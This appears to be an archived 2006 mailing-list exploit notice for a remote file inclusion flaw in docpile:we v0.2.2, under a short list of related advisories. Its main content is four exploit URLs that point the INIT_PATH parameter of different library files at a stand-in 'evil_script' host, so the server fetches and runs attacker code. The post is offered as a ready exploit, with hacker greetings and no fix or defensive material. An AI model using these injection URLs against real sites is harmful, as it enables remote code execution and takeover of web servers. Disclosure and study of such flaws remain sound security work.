Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21432] Comet WebFileManager "Language" File Inclusion Vulnerability

[SA21397] YenerTurk Haber Script "id" SQL Injection Vulnerability

[SA21379] The Address Book Reloaded Login SQL Injection Vulnerabilities

[SA21364] The Address Book Login SQL Injection Vulnerabilities

From:	x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:	09.08.2006
Subject:	docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability

***********************************
TiTLE: docpile:we  v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability
-
Author: xoron
-
Class : Remote
-
cont@ct: x0r0n[at]hotmail[dot]com
-
URL: http://docpile-we.berlios.de
-
Exploit:
http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/email.inc.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/document.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/auth.inc.php?INIT_PATH=http://evil_script?
-
Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D , sakkkure
***************************************************